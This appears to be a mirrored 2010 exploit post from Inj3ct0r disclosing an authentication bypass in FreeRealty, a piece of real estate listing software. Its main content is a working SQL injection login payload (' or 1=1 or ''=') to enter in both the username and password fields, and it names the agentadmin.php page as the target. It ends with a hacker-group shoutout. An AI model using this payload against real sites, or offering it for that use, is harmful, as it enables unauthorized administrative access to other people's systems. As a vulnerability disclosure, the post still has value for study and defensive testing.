Home / os / win7

FreeRealty(Free Real Estate Listing Software) Authentication

Posted on 27 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>FreeRealty(Free Real Estate Listing Software) Authentication bypass</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================
FreeRealty(Free Real Estate Listing Software) Authentication bypass
===================================================================

# Exploit Title: Authentication bypass in FreeRealty(Free Real Estate Listing Software)
# Date: 27-apr-2010
# Author: Sid3^effects
# Software Link: N/a
# CVE : []
# Code : []                   ______________________________________________________________________________                               Authentication bypass in FreeRealty
                       Vendor:http://freerealty.rwcinc.net/
      ___________________________Author:Sid3^effects_________________________________
   
 
Description :
 
 Free Realty  is primarily designed for real estate agents and offices to list properties on the internet. With Free Realty the end user does not need to be fluent in web page design.
  
 
script cost :Free
---------------------------------------------------------------------------
    * Authentication bypass:
 
    The following script has authentication bypass.
 
    use ' or 1=1 or ''=' in both login and password.
 
DEMO :http://[site]/demo/agentadmin.php
 
 
ShoutZ :
-------
               ---Indian Cyber warriors--Andhra hackers-- 


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :